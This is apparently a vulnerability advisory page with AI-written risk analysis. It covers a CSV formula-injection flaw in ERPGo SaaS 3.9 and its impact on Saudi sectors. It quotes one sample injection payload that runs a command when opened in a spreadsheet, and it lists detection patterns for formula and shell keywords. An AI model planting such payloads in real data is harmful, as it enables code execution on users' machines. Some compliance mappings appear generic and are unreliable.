📄 Description (English)
ERPGo SaaS 3.9 contains a CSV injection vulnerability that allows authenticated attackers to execute arbitrary code by injecting formula payloads into vendor name fields. Attackers can add malicious formulas like =10+20+cmd|' /C calc'!A0 in the vendor creation form, which execute when the exported CSV file is opened in spreadsheet applications.
🤖 AI Executive Summary
ERPGo SaaS 3.9 contains a critical CSV injection vulnerability (CVE-2023-54348) allowing authenticated attackers to execute arbitrary code through malicious formula injection in vendor name fields. When exported CSV files are opened in spreadsheet applications, embedded formulas execute with user privileges, potentially leading to system compromise. This vulnerability poses significant risk to Saudi organizations using ERPGo for enterprise resource planning, particularly in financial and supply chain operations.
📄 Description (Arabic)
🤖 AI Intelligence Analysis Analyzed: May 8, 2026 16:33
🇸🇦 Saudi Arabia Impact Assessment
High impact on Saudi banking sector (SAMA-regulated institutions), government procurement systems (NCA), and large enterprises using ERPGo for vendor management. Supply chain disruption risk for ARAMCO and energy sector suppliers. Healthcare organizations managing vendor relationships through ERPGo face operational disruption. Telecom operators (STC, Mobily) using ERPGo for supplier management are at risk. The vulnerability enables insider threats and supply chain compromise, particularly concerning given Saudi Arabia's Vision 2030 digital transformation initiatives and increased reliance on SaaS solutions.
🏢 Affected Saudi Sectors
Banking and Financial Services
Government and Public Administration
Healthcare
Energy and Utilities
Telecommunications
Manufacturing and Supply Chain
Retail and E-commerce
Education
🎯 MITRE ATT&CK Techniques
⚖️ Saudi Risk Score (AI)
8.2
/ 10.0
🔧 Remediation Steps (English)
IMMEDIATE ACTIONS:
1. Disable CSV export functionality in ERPGo until patch is available
2. Restrict vendor creation/modification to trusted administrators only
3. Implement input validation: block formula characters (=, +, -, @, tab, carriage return) in vendor name fields
4. Educate users: warn against opening CSV files from untrusted sources and disable formula execution in spreadsheet applications
COMPENSATING CONTROLS:
5. Configure spreadsheet applications (Excel, LibreOffice) to disable automatic formula execution: Set 'Disable all macros except digitally signed macros' and enable 'Show Formula Bar'
6. Implement CSV sanitization: prefix vendor names with single quote (') before export to prevent formula interpretation
7. Export to alternative formats (PDF, XLSX with macro restrictions) instead of CSV
8. Monitor vendor creation logs for suspicious characters and formula patterns
9. Implement network segmentation to limit spreadsheet application access to trusted networks
DETECTION:
10. Create SIEM rules to detect vendor records containing formula characters: =, +, -, @, |, !
11. Monitor CSV file access and modifications in audit logs
12. Alert on vendor names containing command execution patterns (cmd, powershell, bash)
🔧 خطوات المعالجة (العربية)
الإجراءات الفورية:
1. تعطيل وظيفة تصدير CSV في ERPGo حتى توفر التصحيح
2. تقييد إنشاء/تعديل الموردين للمسؤولين الموثوقين فقط
3. تطبيق التحقق من المدخلات: حظر أحرف الصيغ (=، +، -، @، علامة تبويب، إرجاع سطر) في حقول أسماء الموردين
4. تثقيف المستخدمين: تحذيرهم من فتح ملفات CSV من مصادر غير موثوقة وتعطيل تنفيذ الصيغ في تطبيقات جداول البيانات
الضوابط البديلة:
5. تكوين تطبيقات جداول البيانات (Excel، LibreOffice) لتعطيل تنفيذ الصيغ التلقائي
6. تطبيق تعقيم CSV: إضافة علامة اقتباس مفردة (') قبل أسماء الموردين قبل التصدير
7. التصدير إلى تنسيقات بديلة (PDF، XLSX مع قيود الماكروهات)
8. مراقبة سجلات إنشاء الموردين للأحرف والأنماط المريبة
9. تطبيق تقسيم الشبكة لتحديد وصول تطبيقات جداول البيانات
الكشف:
10. إنشاء قواعد SIEM للكشف عن سجلات الموردين التي تحتوي على أحرف الصيغ
11. مراقبة وصول ملفات CSV والتعديلات في سجلات التدقيق
12. التنبيه على أسماء الموردين التي تحتوي على أنماط تنفيذ الأوامر
📋 Regulatory Compliance Mapping
🟢 NCA ECC 2024
ECC 2024 A.5.1.1 - Information security policies and procedures
ECC 2024 A.5.2.1 - User access management and authentication
ECC 2024 A.5.3.1 - Cryptography and data protection
ECC 2024 A.5.4.1 - Physical and environmental security
ECC 2024 A.6.1.1 - Incident management and response
🔵 SAMA CSF
SAMA CSF ID.AM-2 - Software and hardware inventory
SAMA CSF PR.AC-1 - Access control and authentication
SAMA CSF PR.DS-1 - Data security and protection
SAMA CSF DE.CM-1 - Detection and monitoring
SAMA CSF RS.RP-1 - Response planning and procedures
🟡 ISO 27001:2022
ISO 27001:2022 A.5.15 - Access control
ISO 27001:2022 A.5.16 - Cryptography
ISO 27001:2022 A.5.23 - Information security for supplier relationships
ISO 27001:2022 A.8.1 - User endpoint devices
ISO 27001:2022 A.8.32 - Change management
🟣 PCI DSS v4.0.1
PCI DSS 3.2.1 - Strong cryptography for data protection
PCI DSS 6.2 - Security patches and updates
PCI DSS 6.5.1 - Injection flaws prevention
PCI DSS 10.2 - Logging and monitoring
🔗 References & Sources 4
🔗
🔗
🔗
🔗
https://codecanyon.net/item/erpgo-saas-all-in-one-business-erp-with-project-account-hrm...
disclosure@vulncheck.com
https://rajodiya.com/
disclosure@vulncheck.com
https://www.exploit-db.com/exploits/51220
disclosure@vulncheck.com
https://www.vulncheck.com/advisories/erpgo-saas-csv-injection-via-vendor-creation
disclosure@vulncheck.com